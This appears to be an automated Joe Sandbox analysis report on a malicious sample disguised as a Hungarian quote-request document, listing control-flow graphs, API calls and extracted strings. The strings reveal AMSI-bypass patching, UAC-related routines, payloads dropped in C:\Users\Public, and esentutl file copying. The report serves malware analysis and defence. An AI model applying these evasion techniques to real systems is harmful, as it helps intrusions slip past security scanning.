call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 * 5 9581->9588 9889 29ca9b2-29caa07 call 29b89d0 * 6 9588->9889 9812->8219 9901 29caa0c-29caa16 call 29b89d0 9889->9901 9903 29caa1b-29caa43 call 29b89d0 * 3 9901->9903 9909 29caa48-29cadce call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 9903->9909 10013 29cadd3-29cadda call 29b89d0 9909->10013 10015 29caddf-29cae01 call 29a46d4 * 2 10013->10015 10019 29cae06-29cae0d call 29b89d0 10015->10019 10021 29cae12-29cae34 call 29a46d4 * 2 10019->10021 10025 29cae39-29cae40 call 29b89d0 10021->10025 10027 29cae45-29cb2f3 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29b7c10 call 29b8338 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 10025->10027 10169 29cb2f8-29cb2fa ExitProcess 10027->10169
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029BDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDD5E), ref: 029BDCCB
                                                                                                                                                    • Part of subcall function 029BDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029BDD05
                                                                                                                                                    • Part of subcall function 029BDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029BDD32
                                                                                                                                                    • Part of subcall function 029BDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029BDD3B
                                                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,029CBB30,00000000,00000000,029CBB24,00000000,00000000), ref: 029C40CB
                                                                                                                                                    • Part of subcall function 029B88B8: LoadLibraryW.KERNEL32(amsi), ref: 029B88C1
                                                                                                                                                    • Part of subcall function 029B88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029B8920
                                                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,000003E8,ScanBuffer,02A27380,029CB7B8,UacScan,02A27380), ref: 029C4277
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  • Sleep.KERNEL32(00004E20,UacScan,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacInitialize,02A27380,029CB7B8), ref: 029C50EE
                                                                                                                                                    • Part of subcall function 029BDC04: RtlI.N(?,?,00000000,029BDC7E), ref: 029BDC2C
                                                                                                                                                    • Part of subcall function 029BDC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC42
                                                                                                                                                    • Part of subcall function 029BDC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC61
                                                                                                                                                    • Part of subcall function 029A7E5C: GetFileAttributesA.KERNEL32(00000000,?,029C041F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,UacInitialize), ref: 029A7E67
                                                                                                                                                    • Part of subcall function 029B85BC: WinExec.KERNEL32(?,?), ref: 029B8624
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                  • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                  • API String ID: 2171786310-3926298568
                                                                                                                                                  • Opcode ID: e15ecd440916476b5b4f8cd37259a5f7d384eacdc806e9ba8a7b13081d38df3d
                                                                                                                                                  • Instruction ID: efb3c351ed207ab43c1000ceb8f3a07acdcc1cb76ce8853146eeab29cb830b13
                                                                                                                                                  • Opcode Fuzzy Hash: e15ecd440916476b5b4f8cd37259a5f7d384eacdc806e9ba8a7b13081d38df3d
                                                                                                                                                  • Instruction Fuzzy Hash: DE43FE34A0025D8FDB10EB68DCA1ADE73B6FFC5704F2050BA9409AB654DF70AE568F81
                                                                                                                                                  Function 029BE678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 10195 29be678-29be67c 10196 29be681-29be686 10195->10196 10196->10196 10197 29be688-29bec81 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4740 * 2 call 29a4860 call 29a4778 call 29a30d4 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4740 call 29a7f2c call 29a49a0 call 29a4d74 call 29a4df0 call 29a4740 call 29a49a0 call 29a4d74 call 29a4df0 call 29b8788 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c 10196->10197 10400 29beee2-29bef2f call 29a4500 call 29a4c60 call 29a4500 call 29a4c60 call 29a4500 10197->10400 10401 29bec87-29beedd call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 WaitForSingleObject CloseHandle * 2 call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c * 3 10197->10401 10401->10400
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029B8814
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02A27380,029BEF4C,OpenSession,02A27380,029BEF4C,UacScan,02A27380,029BEF4C,ScanBuffer,02A27380,029BEF4C,OpenSession,02A27380), ref: 029BED6E
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02A27380,029BEF4C,OpenSession,02A27380,029BEF4C,UacScan,02A27380,029BEF4C,ScanBuffer,02A27380,029BEF4C,OpenSession), ref: 029BED76
                                                                                                                                                  • CloseHandle.KERNEL32(000005F0,00000000,00000000,000000FF,ScanString,02A27380,029BEF4C,OpenSession,02A27380,029BEF4C,UacScan,02A27380,029BEF4C,ScanBuffer,02A27380,029BEF4C), ref: 029BED7F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                                  • String ID: )"C:\Users\Public\Libraries\rqbnwzgR.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                                  • API String ID: 3475578485-323478863
                                                                                                                                                  • Opcode ID: aa5855c6a454f743097b30bac1c67fb0ebe489ed26a8120dc8d3f5dff1850ac4
                                                                                                                                                  • Instruction ID: 045c008730c41281bb7a555d51f86c584b043e2021b580c455580e02ffeb556f
                                                                                                                                                  • Opcode Fuzzy Hash: aa5855c6a454f743097b30bac1c67fb0ebe489ed26a8120dc8d3f5dff1850ac4
                                                                                                                                                  • Instruction Fuzzy Hash: 73222D34A0025C9FEB11EB64D991BCEB3BAFFC9700F6050B5A044AB254DB74AE52CF95
                                                                                                                                                  Function 029BAFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 10484 29bafe0-29bafec 10485 29bb0c8-29bb0d2 IsBadReadPtr 10484->10485 10486 29bb0e4-29bb0ea 10485->10486 10487 29bb0d4-29bb0d8 10485->10487 10487->10486 10488 29bb0da-29bb0de 10487->10488 10488->10486 10489 29baff1-29bb007 IsBadReadPtr 10488->10489 10490 29bb00d-29bb044 GetModuleHandleW call 29b8274 10489->10490 10491 29bb0c5 10489->10491 10495 29bb0a8-29bb0b2 IsBadReadPtr 10490->10495 10496 29bb046-29bb04b 10490->10496 10491->10485 10495->10491 10497 29bb0b4-29bb0be IsBadReadPtr 10495->10497 10496->10495 10497->10491 10498 29bb0c0-29bb0c3 10497->10498 10498->10491 10499 29bb04d-29bb05f call 29b84c8 10498->10499 10502 29bb0a2-29bb0a5 10499->10502 10503 29bb061-29bb065 10499->10503 10502->10495 10504 29bb07c-29bb08e call 29b8274 10503->10504 10505 29bb067-29bb07a call 29b8274 10503->10505 10510 29bb090-29bb09d call 29b84c8 10504->10510 10505->10510 10510->10502
                                                                                                                                                  APIs
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 029BB000
                                                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 029BB017
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 029BB0AB
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 029BB0B7
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 029BB0CB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Read$HandleModule
                                                                                                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                                                                                                  • API String ID: 2226866862-113032527
                                                                                                                                                  • Opcode ID: 4f4b5dde6ef4963ced2b8528143b43f096d5504fed1925c55e92ee2863e9d46c
                                                                                                                                                  • Instruction ID: be1bcd55af48dfedc696cfc1f441602bd319254fb128aff14a767094b281142f
                                                                                                                                                  • Opcode Fuzzy Hash: 4f4b5dde6ef4963ced2b8528143b43f096d5504fed1925c55e92ee2863e9d46c
                                                                                                                                                  • Instruction Fuzzy Hash: B2318171A00305BBEF21DB68CD95FAAB7ACBF45358F044510EE24AB2C4D731E900CBA0
                                                                                                                                                  Function 029A1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 12392 29a1724-29a1736 12393 29a1968-29a196d 12392->12393 12394 29a173c-29a174c 12392->12394 12395 29a1973-29a1984 12393->12395 12396 29a1a80-29a1a83 12393->12396 12397 29a174e-29a175b 12394->12397 12398 29a17a4-29a17ad 12394->12398 12399 29a1938-29a1945 12395->12399 12400 29a1986-29a19a2 12395->12400 12402 29a1a89-29a1a8b 12396->12402 12403 29a1684-29a16ad VirtualAlloc 12396->12403 12404 29a175d-29a176a 12397->12404 12405 29a1774-29a1780 12397->12405 12398->12397 12401 29a17af-29a17bb 12398->12401 12399->12400 12411 29a1947-29a195b Sleep 12399->12411 12408 29a19b0-29a19bf 12400->12408 12409 29a19a4-29a19ac 12400->12409 12401->12397 12410 29a17bd-29a17c9 12401->12410 12412 29a16df-29a16e5 12403->12412 12413 29a16af-29a16dc call 29a1644 12403->12413 12414 29a176c-29a1770 12404->12414 12415 29a1794-29a17a1 12404->12415 12406 29a1782-29a1790 12405->12406 12407 29a17f0-29a17f9 12405->12407 12420 29a17fb-29a1808 12407->12420 12421 29a182c-29a1836 12407->12421 12417 29a19d8-29a19e0 12408->12417 12418 29a19c1-29a19d5 12408->12418 12416 29a1a0c-29a1a22 12409->12416 12410->12397 12419 29a17cb-29a17de Sleep 12410->12419 12411->12400 12422 29a195d-29a1964 Sleep 12411->12422 12413->12412 12429 29a1a3b-29a1a47 12416->12429 12430 29a1a24-29a1a32 12416->12430 12426 29a19fc-29a19fe call 29a15cc 12417->12426 12427 29a19e2-29a19fa 12417->12427 12418->12416 12419->12397 12425 29a17e4-29a17eb Sleep 12419->12425 12420->12421 12428 29a180a-29a181e Sleep 12420->12428 12431 29a18a8-29a18b4 12421->12431 12432 29a1838-29a1863 12421->12432 12422->12399 12425->12398 12435 29a1a03-29a1a0b 12426->12435 12427->12435 12428->12421 12437 29a1820-29a1827 Sleep 12428->12437 12441 29a1a68 12429->12441 12442 29a1a49-29a1a5c 12429->12442 12430->12429 12438 29a1a34 12430->12438 12433 29a18dc-29a18eb call 29a15cc 12431->12433 12434 29a18b6-29a18c8 12431->12434 12439 29a187c-29a188a 12432->12439 12440 29a1865-29a1873 12432->12440 12453 29a18fd-29a1936 12433->12453 12457 29a18ed-29a18f7 12433->12457 12447 29a18ca 12434->12447 12448 29a18cc-29a18da 12434->12448 12437->12420 12438->12429 12443 29a18f8 12439->12443 12444 29a188c-29a18a6 call 29a1500 12439->12444 12440->12439 12450 29a1875 12440->12450 12446 29a1a6d-29a1a7f 12441->12446 12445 29a1a5e-29a1a63 call 29a1500 12442->12445 12442->12446 12443->12453 12444->12453 12445->12446 12447->12448 12448->12453 12450->12439
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,029A2000), ref: 029A17D0
                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,029A2000), ref: 029A17E6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: 189fe8bbada0a84cf60418f23197a6ea6db6f6b26bd1ddd5b079f8b67c56482d
                                                                                                                                                  • Instruction ID: 0864f1cbb9bf0358617b65b9b36c40ef5e8d398e31b655786f01341c78c06142
                                                                                                                                                  • Opcode Fuzzy Hash: 189fe8bbada0a84cf60418f23197a6ea6db6f6b26bd1ddd5b079f8b67c56482d
                                                                                                                                                  • Instruction Fuzzy Hash: F9B12376A003518BCB25CF2CE490365BBE1FB8A351F1A86AED45D8B385DB70D456CBD0
                                                                                                                                                  Function 029B88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 029B88C1
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                    • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029B8920
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                  • String ID: DllGetClassObject$W$amsi
                                                                                                                                                  • API String ID: 941070894-2671292670
                                                                                                                                                  • Opcode ID: 16e1840818db9a5f83bfd7945d03aab1a129896fe29def39522248c9fc407ecd
                                                                                                                                                  • Instruction ID: d66f84d417a654caf325d497211a3d8104bce4e1526db62565984581c4af5111
                                                                                                                                                  • Opcode Fuzzy Hash: 16e1840818db9a5f83bfd7945d03aab1a129896fe29def39522248c9fc407ecd
                                                                                                                                                  • Instruction Fuzzy Hash: 14F0A45154C381B9D702E6B8CC45F8BBECD5FE6264F048B18B1E89A2D2D675D10487A7
                                                                                                                                                  Function 029A1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 12480 29a1a8c-29a1a9b 12481 29a1b6c-29a1b6f 12480->12481 12482 29a1aa1-29a1aa5 12480->12482 12483 29a1c5c-29a1c60 12481->12483 12484 29a1b75-29a1b7f 12481->12484 12485 29a1b08-29a1b11 12482->12485 12486 29a1aa7-29a1aae 12482->12486 12487 29a16e8-29a170b call 29a1644 VirtualFree 12483->12487 12488 29a1c66-29a1c6b 12483->12488 12490 29a1b3c-29a1b49 12484->12490 12491 29a1b81-29a1b8d 12484->12491 12485->12486 12489 29a1b13-29a1b27 Sleep 12485->12489 12492 29a1adc-29a1ade 12486->12492 12493 29a1ab0-29a1abb 12486->12493 12509 29a170d-29a1714 12487->12509 12510 29a1716 12487->12510 12489->12486 12496 29a1b2d-29a1b38 Sleep 12489->12496 12490->12491 12498 29a1b4b-29a1b5f Sleep 12490->12498 12499 29a1b8f-29a1b92 12491->12499 12500 29a1bc4-29a1bd2 12491->12500 12494 29a1af3 12492->12494 12495 29a1ae0-29a1af1 12492->12495 12501 29a1abd-29a1ac2 12493->12501 12502 29a1ac4-29a1ad9 12493->12502 12503 29a1af6-29a1b03 12494->12503 12495->12494 12495->12503 12496->12485 12498->12491 12507 29a1b61-29a1b68 Sleep 12498->12507 12504 29a1b96-29a1b9a 12499->12504 12500->12504 12505 29a1bd4-29a1bd9 call 29a14c0 12500->12505 12503->12484 12511 29a1bdc-29a1be9 12504->12511 12512 29a1b9c-29a1ba2 12504->12512 12505->12504 12507->12490 12517 29a1719-29a1723 12509->12517 12510->12517 12511->12512 12516 29a1beb-29a1bf2 call 29a14c0 12511->12516 12513 29a1bf4-29a1bfe 12512->12513 12514 29a1ba4-29a1bc2 call 29a1500 12512->12514 12520 29a1c2c-29a1c59 call 29a1560 12513->12520 12521 29a1c00-29a1c28 VirtualFree 12513->12521 12516->12512
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNEL32(00000000,?), ref: 029A1B17
                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?), ref: 029A1B31
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
